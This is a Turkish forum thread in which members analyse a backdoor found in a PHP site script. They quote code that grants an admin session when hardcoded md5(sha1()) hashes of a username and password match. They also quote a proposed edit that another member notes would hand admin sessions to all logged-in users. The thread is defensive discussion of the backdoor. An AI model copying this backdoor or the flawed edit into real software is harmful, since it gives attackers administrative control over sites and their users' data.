• 18-11-2023, 09:20:15
    #10
    Yada bu şekilde yapabilirsiniz.
    Voga adlı üyeden alıntı: mesajı görüntüle
    #if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "") {
    $db->where ("yetki", 9);
    $db->where ("durum", 1);
    $ksoku = $db->getOne("s_kullanicilar");
    $_SESSION[ONEK . 'kullanici'] = $ksoku['id'];
    } ?>
  • 18-11-2023, 09:30:31
    #11
    ntka adlı üyeden alıntı: mesajı görüntüle
    Bu şekilde düzenleyebilirsiniz.
    Kodu komple silerseniz sizde giriş yapamayabilirsiniz.
    if (isset($_SESSION["login"]) && re('k_adi') and isset($_SESSION["login"]) && re('k_sifre')) {
        $db->where ("yetki", 9);
        $db->where ("durum", 1);
        $ksoku = $db->getOne("s_kullanicilar");
        $_SESSION[ONEK . 'kullanici'] = $ksoku['id'];
    } ?>
    haklısınız ama bence gerek yok komple silebilir.

    if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "d06457eb6d724de98ffd8ef5deee3171" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "b404f70735137b2b93fd9401a9cc9233")
    if içersini bağlamış zaten sadece belirli bir kullanıcı için çalışan kod, giriş yapamamasında sorun olacağını düşünmüyorum sadece belirlediği bir kullanıcının sessiona id atamış.

    eğer kaldırılmayıp önerdiğiniz gibi düzenlenirse bu session bütün login yapan kullanıcılara atanacaktır. daha tehlikeli bir durum hal alabilir. bununla artık ne yapılacaksa
  • 18-11-2023, 09:36:05
    #12
    Amaç içeride neler yapıyor ne işler karıştırıyor onu gözlemlemek.
    Hangi çağda yaşadığını unutmuş olmalı yapan
    Ya komple yazılımı şifrele yada böyle gereksiz şeylerle uğraşma ama şimdi şöyle bir şey de var kodlara bakmayan birisi alıp kursa direk eleman siteye müdehale edebilir verileri silebilir vs..
    Tehlikeli işler.
    Bence bunu yapanı açıklasın konu sahibi yapan forumda ise ona dikkatli olsun diğer kullanıcılar.
    iskendercnr adlı üyeden alıntı: mesajı görüntüle
    haklısınız ama bence gerek yok komple silebilir.

    if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "d06457eb6d724de98ffd8ef5deee3171" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "b404f70735137b2b93fd9401a9cc9233")
    if içersini bağlamış zaten sadece belirli bir kullanıcı için çalışan kod, giriş yapamamasında sorun olacağını düşünmüyorum sadece belirlediği bir kullanıcının sessiona id atamış.

    eğer kaldırılmayıp önerdiğiniz gibi düzenlenirse bu session bütün login yapan kullanıcılara atanacaktır. daha tehlikeli bir durum hal alabilir. bununla artık ne yapılacaksa
  • 18-11-2023, 13:35:44
    #13
    ntka adlı üyeden alıntı: mesajı görüntüle
    Amaç içeride neler yapıyor ne işler karıştırıyor onu gözlemlemek.
    Hangi çağda yaşadığını unutmuş olmalı yapan
    Ya komple yazılımı şifrele yada böyle gereksiz şeylerle uğraşma ama şimdi şöyle bir şey de var kodlara bakmayan birisi alıp kursa direk eleman siteye müdehale edebilir verileri silebilir vs..
    Tehlikeli işler.
    Bence bunu yapanı açıklasın konu sahibi yapan forumda ise ona dikkatli olsun diğer kullanıcılar.
    Katılıyorum. Tam anlamıyla bir backdoor var, girip ne var ne yok diye kontrol etmek için yapmış. Dikkat etmek gerekir.